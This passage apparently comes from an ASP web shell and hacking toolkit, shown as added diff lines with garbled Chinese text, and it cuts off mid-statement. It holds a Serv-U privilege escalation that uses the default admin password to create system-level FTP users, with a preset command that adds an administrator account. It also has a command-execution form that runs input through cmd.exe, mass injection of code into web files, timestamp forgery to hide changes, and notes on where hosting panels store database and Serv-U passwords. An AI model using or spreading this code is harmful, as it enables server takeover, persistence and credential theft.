+:Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>��*�</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user 80sec 80sec /add & net localgroup administrators 80sec /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·?q��:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+FuncTion su7()
+response.write"<form name='form1' method='post' action=''>"
+response.write"<p align='center'>"
+response.write"------------------Serv-U Information------------------"
+response.write"<br>"
+response.write"user:"
+response.write"<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+response.write"pwd :"
+response.write"<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+response.write"port:"
+response.write"<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+response.write"---------------------Add User!!! ---------------------<BR>"
+response.write"Domain: &nbsp; "
+response.write"<input name='domain' type='text' class='TextBox' id='domain' value='80sec' /><br>"
+response.write"FTP USER:"
+response.write"<input name='fuser' type='text' class='TextBox' id='fuser' value='80sec'><br>"
+response.write"FTP PASS:"
+response.write"<input name='fpass' type='text' class='TextBox' id='fpass' value='123456'><br>"
+response.write"FTP PORT:"
+response.write"<input name='fport' type='text' class='TextBox' id='fport' value='21'><br>"
+response.write"FTP PATH:"
+response.write"<input name='fpath' type='text' class='TextBox' id='fpath' value='c:\\'>"
+response.write"<br>"
+response.write"Privilege"
+response.write"<select para=value name='privilege'>"
+response.write"<option value=2>Read-only Admin</option>"
+response.write"<option value=3>Group Admin</option>"
+response.write"<option value=4>Domain Admin</option>"
+response.write"<option value=5>System Admin</option>"
+response.write"</select>"
+response.write"</p>"
+response.write"<p align='center'>"
+response.write"<input name='radiobutton' type='radio' value='add' checked class='TextBox'>"
+response.write"Add User "
+response.write"<input type='radio' name='radiobutton' value='del' class='TextBox'> "
+response.write"Del User </p>"
+response.write"<p align='center'>"
+response.write"<input name='Submit' type='submit' class='buttom' value='Run' />"
+response.write"</p>"
+response.write"</form>"
+user = request.Form("duser")
+pass = request.Form("dpwd")
+port = request.Form("dport")
+domain = request.Form("domain")
+fuser = request.Form("fuser")
+fpass = request.Form("fpass")
+fport = request.Form("fport")
+fpath = request.Form("fpath")
+privilege=request.Form("privilege")
+select case privilege
+   case 2:
+  privilege="ReadOnly"
+   case 3:
+  privilege="Group"
+   case 4:
+  privilege="Domain"
+   case 5:
+  privilege="System"
+  end select
+	if request.Form("radiobutton") = "add" Then
+
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & "  DynIPName=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
+        "-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=" & privilege  & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf		
+		'--------
+		'On Error Resume Next
+		Set xPost = CreateObject("Microsoft.XMLHTTP")
+		xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
+		xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
+		Set xPost =nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &"</div>"
+	elseif request.Form("radiobutton") = "del" Then
+	
+		loginuser = "User " & user & vbCrLf
+		loginpass = "Pass " & pass & vbCrLf
+		mt = "SITE MAINTENANCE" & vbCrLf
+		deluser =  "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
+		quit = "QUIT" & vbCrLf	
+		Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+		xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
+		xPost3.Send loginuser & loginpass & mt & deluser & quit 
+		Set xPOST3=nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &" have deleted</div>"
+	else
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
+	end if
+end function
+Function fuzhutq1()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"360ɱ��db�ļ��滻:<br>"
+RRS"c:\Program Files\360\360SD\deepscan\Section\mutex.db <br> "
+RRS"c:\Program Files\360\360Safe\deepscan\Section\mutex.db <br>"
+RRS"C:\Program Files\360\360Safe\AntiSection\mutex.db <br>"
+RRS"Flash�ļ��滻:<br>"
+RRS"C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx <br>"
+RRS"IISrewrite3 �ļ��滻��<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\error.log <br>"
+RRS"DU Meter����ͳ����Ϣ��־�ļ��滻��<br> "
+RRS"c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv <br>"
+RRS"ŵ��ɱ���ļ��滻:<br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.bak <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Validate.dat  <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.Dat  <br>"
+RRS"�����ļ��滻:<br>"
+RRS"C:\WINDOWS\hchiblis.ibl <br>"
+RRS"һ���������Ŀ¼���ļ��� <br>"
+RRS"C:\7i24.com\iissafe\log\startandiischeck.txt  <br>"
+RRS"C:\7i24.com\iissafe\log\scanlog.htm   <br>"
+RRS"�������:<br>"
+RRS"Zend: C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll  <br>"
+RRS"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\  <br>"
+RRS"Ps:������Ȩ����ͨ���ڸ���������ϵͳ<br>"
+end function
+Function fuzhutq2()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"1`c:\windows\temp����hzhost�������µ�ftp��½��¼v���û���������<br>"
+RRS"2@��mssql sa����,mysql root���뼰serv-u��administrator����<br>"
+RRS"mysql root���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass <br>"
+RRS"sqlserver sa���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass<br>"
+RRS"Serv-u�������룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\svrpass<br>"
+RRS"������Ϣ���hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��ʹ��<br>"
+RRS"���ص�ַ���ٶ����� 'hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��' <br>"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq3()
+RRS"<p><center>:N����������������Ȩ:</p><center>"
+RRS"Ĭ�����ݿ����أ�<br>"
+RRS"1.9�棺host_date/%23host%20%23%20date%23.mdb<br>"
+RRS"1.96�棺host_date/%23host%20%23%20date%23196.mdb <br>"
+RRS"���巽����ͨ��������ͬ������IIS,Ȼ���վ��N�����վ��Ŀ¼�£�����ͨ��������ַ���ػصõ���sa��mysql��վ���������Ϣ��key��ͨ������Ĵ�����ܣ�<br>"
+'RRS"��ַ:����Ĵ�"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq4()
+RRS"<font color=#00FF00>��ȴ��������2ED</font>"
+end function
+Function fuzhutq5()
+if Request("Paths") ="" then
+Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"
+if Session("paths")<>"" then  Paths_str=Session("paths")
+	Response.Write "<form id='form1' name='form1' method='post' action=''>"
+	Response.Write "�˳�����Լ�����������Ŀ¼��д���,Ϊ��������ṩһЩ��ȫ�����Ϣ!<br>�����������Ŀ¼,������Զ������Ŀ¼<br>"	
+	Response.Write "<textarea name='Paths' cols='80' rows='10' class='Edit'>"&Paths_str&"</textarea>"
+	Response.Write "<br />"
+	Response.Write "<input type='submit' name='button' value='��ʼ���' / class='but1'>"
+	Response.Write "<label for='CheckNextDir'>"
+	Response.Write "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />����Ŀ¼  "
+	Response.Write "</label>"
+	Response.Write "<label for='CheckFile'>"
+	Response.Write "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  />�����ļ�"
+	Response.Write "</label>"
+	Response.Write "<label for='ShowNoWrite'>"
+	Response.Write "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
+	Response.Write "�Խ�дĿ¼���ļ�</label>"
+	Response.Write "<label for='NoCheckTemp'>"
+	Response.Write "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
+	Response.Write "�������ʱĿ¼</label>"	
+	Response.Write "</form>"
+else
+Response.Write  "<a href=""?"">��������·��</a><br>"
+CheckFile = (Request("CheckFile")="on")
+CheckNextDir = (Request("CheckNextDir")="on")
+ShowNoWriteDir = (Request("ShowNoWrite")="on")
+NoCheckTemp = (Request("NoCheckTemp")="on")
+Response.Write "��������Ҫһ����ʱ�����Ե�......<br>"
+response.Flush
+
+Session("paths") = Request("Paths")
+
+PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
+For i=LBound(PathsSplit) To UBound(PathsSplit) 
+if instr(PathsSplit(i),":")>0 then
+	ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
+End If 
+Next
+Response.Write "[ɨ�����]<br>"
+end if
+end function
+Function cmd2()
+response.write"<form method='post'>"
+response.write"<input type=text name='cmd' size=60>"
+response.write"<input type=submit value='run'></form> "
+response.write"<textarea readonly cols=80 rows=20> "
+response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall
+response.write"</textarea>"
+end function
+Function suftp()
+RRS"<p><center>���ɰ汾��Ϣ:</p>"
+RRS"<form name='form1' method='post' action=''>"
+RRS"<center>����Ա:<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+RRS"<center>����Ա���� :<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+RRS"<center>SERV-U�˿�:<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+RRS"<center>���ӵ��û���:<input name='tuser' type='text' class='TextBox' id='tuser' value='1'><br>"
+RRS"<center>���ӵ��û�����:<input name='tpass' type='text' class='TextBox' id='pass' value='1'><br>"
+RRS"<center>�ʺŵ����Ե�·��:<input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'><br>"
+RRS"<center>����˿�:<input name='tport' type='text' class='TextBox' id='tport' value='21'><br>"
+RRS"<center><input name='radiobutton' type='radio' value='add' checked class='TextBox'>ȷ������"
+RRS"<center><input type='radio' name='radiobutton' value='del' class='TextBox'>ȷ��ɾ��"
+RRS"<p><input name='Submit' type='submit' class='buttom' value='�ύ'></p></form>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+'leaves = leaves & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
